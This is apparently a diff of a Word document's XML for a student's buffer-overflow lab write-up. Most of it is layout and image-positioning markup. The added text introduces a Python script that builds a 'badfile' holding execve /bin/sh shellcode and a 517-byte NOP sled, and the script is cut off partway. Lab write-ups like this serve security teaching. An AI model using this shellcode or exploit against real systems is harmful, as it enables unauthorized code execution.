-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
         <w:drawing>
           <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="7">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>34290</wp:posOffset>
+              <wp:posOffset>0</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>56515</wp:posOffset>
+              <wp:posOffset>4264660</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="6332220" cy="5455920"/>
+            <wp:extent cx="6332220" cy="4265295"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapTopAndBottom/>
             <wp:docPr id="6" name="Image6" descr="" title=""/>
@@ -2910,7 +2908,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="6332220" cy="5455920"/>
+                      <a:ext cx="6332220" cy="4265295"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2923,31 +2921,47 @@
         </w:drawing>
       </w:r>
       <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:spacing w:before="0" w:after="140"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:drawing>
           <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>35560</wp:posOffset>
+              <wp:posOffset>0</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>89535</wp:posOffset>
+              <wp:posOffset>56515</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="6332220" cy="5455920"/>
+            <wp:extent cx="6332220" cy="4265295"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapTopAndBottom/>
             <wp:docPr id="7" name="Image7" descr="" title=""/>
@@ -2972,7 +2986,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="6332220" cy="5455920"/>
+                      <a:ext cx="6332220" cy="4265295"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2983,13 +2997,1154 @@
             </a:graphic>
           </wp:anchor>
         </w:drawing>
-      </w:r>
-      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>4321175</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="4265295"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="8" name="Image8" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="8" name="Image8" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="4265295"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:br/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>Now that I have everything that I need to begin the attack, I can modify the provided python script to create the badfile:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>#!/usr/bin/python3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>import sys</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t># Replace the content with the actual shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>shellcode= (</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"\xd2\x31\xc0\xb0\x0b\xcd\x80"  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>).encode('latin-1')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t># Fill the content with NOP's</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">content = bytearray(0x90 for i in range(517)) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>################################################################</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t># Put the shellcode somewhere in the payload</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">start = 517 - len(shellcode)               # Change this number </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
